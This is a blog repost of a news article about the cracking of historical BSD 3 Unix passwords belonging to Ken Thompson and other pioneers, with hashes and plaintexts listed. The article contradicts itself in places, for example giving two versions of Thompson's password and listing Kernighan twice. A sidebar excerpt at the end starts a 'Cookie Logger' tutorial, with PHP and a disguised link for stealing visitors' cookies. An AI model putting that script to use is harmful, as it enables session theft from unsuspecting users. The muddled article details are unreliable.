Skip to main content

UNIX Co-Founder Ken Thompson's BSD Password Has Finally Been Hacked


A 39-year-old login password of Ken Thompson, the co-creator of the UNIX operating system among, has finally been cracked that belongs to a BSD-based system, one of the original versions of UNIX, which was back then used by various computer science pioneers.

In 2014, developer Leah Neukirchen spotted an interesting "/etc/passwd" file in a publicly available source tree of historian BSD version 3, which includes hashed passwords belonging to more than two dozens Unix luminaries who worked on UNIX development, including Dennis Ritchie, Stephen R. Bourne, Ken Thompson, Eric Schmidt, Stuart Feldman, and Brian W. Kernighan.

Since all passwords in that list are protected using now-depreciated DES-based crypt(3) algorithm and limited to at most 8 characters, Neukirchen decided to brute-force them for fun and successfully cracked passwords (listed below) for almost everyone using password cracking tools like John the Ripper and hashcat.


The ones that she wasn't able to crack belonged to Ken Thompson and five other contributors who helped build the Unix system, including Bill Joy, who later co-founded Sun Microsystems in 1986 and designed the Java programming language.

"Ken's password eluded my cracking endeavor. Even an exhaustive search over all lower-case letters and digits took several days (back in 2014) and yielded no result," she wrote in a blog post published Wednesday.

"I also realized that compared to other password hashing schemes (such as NTLM), crypt(3) turns out to be quite a bit slower to crack (and perhaps was also less optimized)."

All Passwords Have Finally Been Cracked, Except Just One!


Earlier this month, Neukirchen posted all her findings on the Unix Heritage Society mailing list and requested other members to help to crack the remaining passwords.

Just 6 days after that, Australian engineer Nigel Williams responded with the plaintext password of Thompson, the father of Unix, which he claimed to have cracked in over 4 days using "an AMD Radeon Vega64 running hashcat at about 930MH/s."

Thompson's password has been revealed as "p/q2-q4!a" — a notation in chess to describe the move "pawn from Queen's 2 to Queen's 4."

Just a day after Willians revealed Thompson's password, another mailing list member, Arthur Krewat, successfully cracked and provided the passwords for four more remaining uncracked hashes.

Here below we have listed plaintext passwords of all Unix luminaries, including their names, usernames and original hashed versions of their passwords:

Ken Thompson, co-inventor of Unix
  • Hashed → ZghOT0eRm4U9s
  • Plaintext → p/q2-q4!

Dennis Ritchie, co-inventor of BSD and creator of the C programming language
  • Hashed → gfVwhuAMF0Trw
  • Plaintext → dmac

Brian W. Kernighan, Canadian computer scientist and Unix contributor
  • Hashed → ymVglQZjbWYDE:
  • Plaintext → /.,/.,

Stephen R. Bourne, creator of the Bourne shell command line interpreter
  • Hashed → c8UdIntIZCUIA
  • Plaintext → bourne

Eric Schmidt, an early developer of Unix software and Former Google CEO:
  • Hashed → FH83PFo4z55cU
  • Plaintext → wendy!!!

Stuart Feldman, author of Unix automation tool make and the first Fortran compiler
  • Hashed → IIVxQSvq1V9R2
  • Plaintext → axolotl

Here's a list of cracked passwords belonging to other computer science pioneers:

PersonUsernameHashesPlaintext password
Mark HortonmarkPb1AmSpsVPG0Yuio
Kirk McKusickmckusickAAZk9Aj5/Ue0Efoobar
Richard FatemanfatemanE9i8fWghn1p/Iapr1744
Runs a program, not a login shellnetwork9EZLtSYjeEABEnetwork
UNIX-to-UNIX CopyuucpP0CHBwE/mB51kwhatnot
Peter KesslerpeterNc3IkFJyW2u7E...hello
Kurt ShoenskurtolqH1vDqH38awsacristy
Brian W. Kernighanjkf9ULn5cWTc0b9Esherril.
Peter J. WeinbergerpjwN33.MCNcTh5Qwuucpuucp
Ernie Co-vaxrootOVCPatZ8RFmFYcowperso
John ReiserjfrX.ZNnZrciWauE5%ghj
Steve JohnsonscjIL2bmGECQJgbkpdq;dq
Bob Kridlekridle4BkcEieEtjWXIjilland1
Keith Sklowersklower8PYh/dUBQT9Sstheik!!!
Robert Henryhenrylj1vXnxTAPnDcsn74193n
Howard Katseffhpk9ycwM8mmmcp4Qgraduat;
Özalp Babaoğluozalpm5syt3.lB5LAE12ucdort
Bob Fabryfabryd9B17PTU2RTlM561cml..
Tom LondontblcBWEbG59spEmM..pnn521

Until now, all members in the list that Neukirchen found have had their passwords cracked except Bill Joy, whose username is bill and hashed password is ".2xvLVqGHJm8M"
Source :The Hacker News

Comments

Popular posts from this blog

10 Best Forum Software For Webmasters

10 Best Forum Software For Webmasters Do you want to create your online discussion forum or online community where people can discuss about their favorite topics? In this article, you can see 10 best forum software (scripts for setting up discussion forums) that can be used free of cost. Although some scripts are paid but rest of these forum scripts are free to use.You only need to buy hosting space and domain name for your website and after then you can install any of these forum scripts to start your own discussion forums on the internet. Online discussion forums generate huge page views because thousands of people want to join online discussion forums to ask questions or share knowledge. Some of online marketers join forums to discuss about their products with community members. You don't need to acquire any kind of technical skill to run a professional discussion forums because these days, almost all web hosting providers offer one click script installer which h

Assembly Language Step-by-step: Programming with DOS and Linux-

(-Assembly Language Step-by-step: Programming with DOS and Linux-) The bestselling guide to assembly language-now updated and expanded to include coverage of Linux . This new edition of the bestselling guide to assembly programming now covers DOS and Linux! The Second Edition begins with a highly accessible overview of the internal operations of the Intel-based PC and systematically covers all the steps involved in writing, testing, and debugging assembly programs. Expert author Jeff Duntemann then presents working example programs for both the DOS and Linux operating systems using the popular free assembler NASM. He also includes valuable information on how to use procedures and macros, plus rare explanations of assembly-level coding for Linux, all of which combine to offer a comprehensive look at the complexities of assembly programming for Intel processors. Providing you with the foundation to create executable assembly language programs, this book: * Explains how to use NASM

Cookie Logger

         Cookie Logger ---------------------------------------------- A Cookie Logger is a Script that is Used to Steal anybody’s Cookies and stores it into a Log File from where you can read the Cookies of the Victim. Today I am going to show How to make your own Cookie Logger… Hope you will enjoy Reading it... STEP 1: Copy & Save the notepad file from below and Rename it as Fun.gif <a href="www.yoursite.com/fun.gif"><img style="cursor: pointer; width: 116px; height: 116px;" src="nesite.com/jpg" /></a> STEP 2: Copy the Following Script into a Notepad File and Save the file as cookielogger.php $filename = “logfile.txt”; if (isset($_GET["cookie"])) { if (!$handle = fopen($filename, ‘a’)) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } else { if (fwrite($handle, “rn” . $_GET["cookie"]) === FALSE) { echo “Temporary Server Error,Sorry for the inconvenience.”; exit; } } echo “Temporary